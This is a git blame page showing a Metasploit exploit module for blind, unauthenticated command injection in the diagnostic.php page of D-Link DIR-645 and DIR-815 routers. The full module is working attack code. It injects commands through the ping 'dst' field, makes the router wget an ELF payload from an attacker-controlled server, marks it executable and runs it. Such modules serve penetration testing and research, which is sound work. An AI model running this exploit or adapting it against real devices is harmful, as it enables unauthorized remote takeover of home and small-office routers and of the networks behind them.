Files
metasploit-gs/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

225 lines
7.2 KiB
Ruby
Raw Normal View History

2013-04-05 19:56:15 +02:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2013-04-05 19:56:15 +02:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-04-05 19:56:15 +02:00
Rank = ExcellentRanking
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
def initialize(info = {})
2025-06-20 13:20:44 +01:00
super(
update_info(
info,
'Name' => 'D-Link DIR-645 / DIR-815 diagnostic.php Command Execution',
'Description' => %q{
2013-07-23 14:11:16 -05:00
Some D-Link Routers are vulnerable to OS Command injection in the web interface.
2025-06-20 13:20:44 +01:00
On DIR-645 versions prior 1.03 authentication isn't needed to exploit it. On
version 1.03 authentication is needed in order to trigger the vulnerability, which
has been fixed definitely on version 1.04. Other D-Link products, like DIR-300 rev B
and DIR-600, are also affected by this vulnerability. Not every device includes
wget which we need for deploying our payload. On such devices you could use the cmd
generic payload and try to start telnetd or execute other commands. Since it is a
blind OS command injection vulnerability, there is no output for the executed
command when using the cmd generic payload. A ping command against a controlled
system could be used for testing purposes. This module has been tested successfully
on DIR-645 prior to 1.03, where authentication isn't needed in order to exploit the
vulnerability.
},
'Author' => [
2014-07-11 12:45:23 -05:00
'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
2013-04-05 19:56:15 +02:00
'juan vazquez' # minor help with msf module
],
2025-06-20 13:20:44 +01:00
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2014-100005' ],
[ 'OSVDB', '92144' ],
2013-04-09 11:56:53 +02:00
[ 'BID', '58938' ],
[ 'EDB', '24926' ],
2013-04-05 19:56:15 +02:00
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-017' ]
],
2025-06-20 13:20:44 +01:00
'DisclosureDate' => '2013-03-05',
'Privileged' => true,
'Platform' => %w{linux unix},
'Payload' => {
2013-04-05 19:56:15 +02:00
'DisableNops' => true
},
2025-06-20 13:20:44 +01:00
'Targets' => [
[
'CMD',
2013-04-05 19:56:15 +02:00
{
2025-06-20 13:20:44 +01:00
'Arch' => ARCH_CMD,
'Platform' => 'unix'
2013-04-05 19:56:15 +02:00
}
],
2025-06-20 13:20:44 +01:00
[
'Linux mipsel Payload',
2013-04-05 19:56:15 +02:00
{
2025-06-20 13:20:44 +01:00
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
2013-04-05 19:56:15 +02:00
}
],
],
'DefaultTarget' => 1,
'Notes' => {
2025-06-23 12:43:46 +01:00
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
2025-06-20 13:20:44 +01:00
)
)
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
register_options(
[
OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
2025-06-20 13:20:44 +01:00
]
)
2013-04-05 19:56:15 +02:00
end
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
def request(cmd, uri)
2013-04-05 19:56:15 +02:00
begin
res = send_request_cgi({
2025-06-20 13:20:44 +01:00
'uri' => uri,
2013-04-05 19:56:15 +02:00
'method' => 'POST',
'vars_post' => {
"act" => "ping",
2013-04-15 13:27:47 -05:00
"dst" => "` #{cmd}`"
}
2013-04-05 19:56:15 +02:00
})
2025-06-20 13:20:44 +01:00
return res
2013-04-05 19:56:15 +02:00
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return nil
end
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
def exploit
2025-06-20 13:20:44 +01:00
downfile = datastore['DOWNFILE'] || rand_text_alpha(8 + rand(8))
2013-04-05 19:56:15 +02:00
uri = '/diagnostic.php'
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
if target.name =~ /CMD/
if not (datastore['CMD'])
2013-08-15 14:14:46 -05:00
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
2013-04-05 19:56:15 +02:00
end
cmd = payload.encoded
2025-06-20 13:20:44 +01:00
res = request(cmd, uri)
2013-04-05 19:56:15 +02:00
if (!res)
2013-08-15 14:14:46 -05:00
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
2013-04-05 19:56:15 +02:00
end
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
2013-04-05 19:56:15 +02:00
return
end
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
# thx to Juan for his awesome work on the mipsel elf support
2013-04-05 19:56:15 +02:00
@pl = generate_payload_exe
@elf_sent = false
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
#
# start our server
#
resource_uri = '/' + downfile
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
if (datastore['DOWNHOST'])
service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
else
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
# we use SRVHOST as download IP for the coming wget command.
# SRVHOST needs a real IP address of our download host
2013-04-05 19:56:15 +02:00
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
2025-06-20 13:20:44 +01:00
start_service({
'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
2013-04-05 19:56:15 +02:00
},
2025-06-20 13:20:44 +01:00
'ssl' => false # do not use SSL
})
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
#
# download payload
#
2013-07-23 14:11:16 -05:00
print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}")
2025-06-20 13:20:44 +01:00
# this filename is used to store the payload on the device
2013-04-05 19:56:15 +02:00
filename = rand_text_alpha_lower(8)
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
# not working if we send all command together -> lets take three requests
2013-04-05 19:56:15 +02:00
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
2025-06-20 13:20:44 +01:00
res = request(cmd, uri)
2013-04-05 19:56:15 +02:00
if (!res)
2013-08-15 14:14:46 -05:00
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
2013-04-05 19:56:15 +02:00
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
# wait for payload download
if (datastore['DOWNHOST'])
2013-07-23 14:11:16 -05:00
print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
2013-04-05 19:56:15 +02:00
select(nil, nil, nil, datastore['HTTP_DELAY'])
else
wait_linux_payload
end
register_file_for_cleanup("/tmp/#{filename}")
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
#
# chmod
#
cmd = "chmod 777 /tmp/#{filename}"
2013-07-23 14:11:16 -05:00
print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
2025-06-20 13:20:44 +01:00
res = request(cmd, uri)
2013-04-05 19:56:15 +02:00
if (!res)
2013-08-15 14:14:46 -05:00
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
2013-04-05 19:56:15 +02:00
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
#
# execute
#
cmd = "/tmp/#{filename}"
2013-07-23 14:11:16 -05:00
print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
2025-06-20 13:20:44 +01:00
res = request(cmd, uri)
2013-04-05 19:56:15 +02:00
if (!res)
2013-08-15 14:14:46 -05:00
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
2013-04-05 19:56:15 +02:00
end
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
# Handle incoming requests from the server
def on_request_uri(cli, request)
2025-06-20 13:20:44 +01:00
# print_status("on_request_uri called: #{request.inspect}")
2013-04-05 19:56:15 +02:00
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
# wait for the data to be sent
def wait_linux_payload
2013-04-15 13:27:47 -05:00
print_status("#{rhost}:#{rport} - Waiting for the target to request the ELF payload...")
2013-08-30 16:28:54 -05:00
2013-04-05 19:56:15 +02:00
waited = 0
while (not @elf_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > datastore['HTTP_DELAY'])
2013-08-15 14:14:46 -05:00
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it can't connect back to us?")
2013-04-05 19:56:15 +02:00
end
end
end
end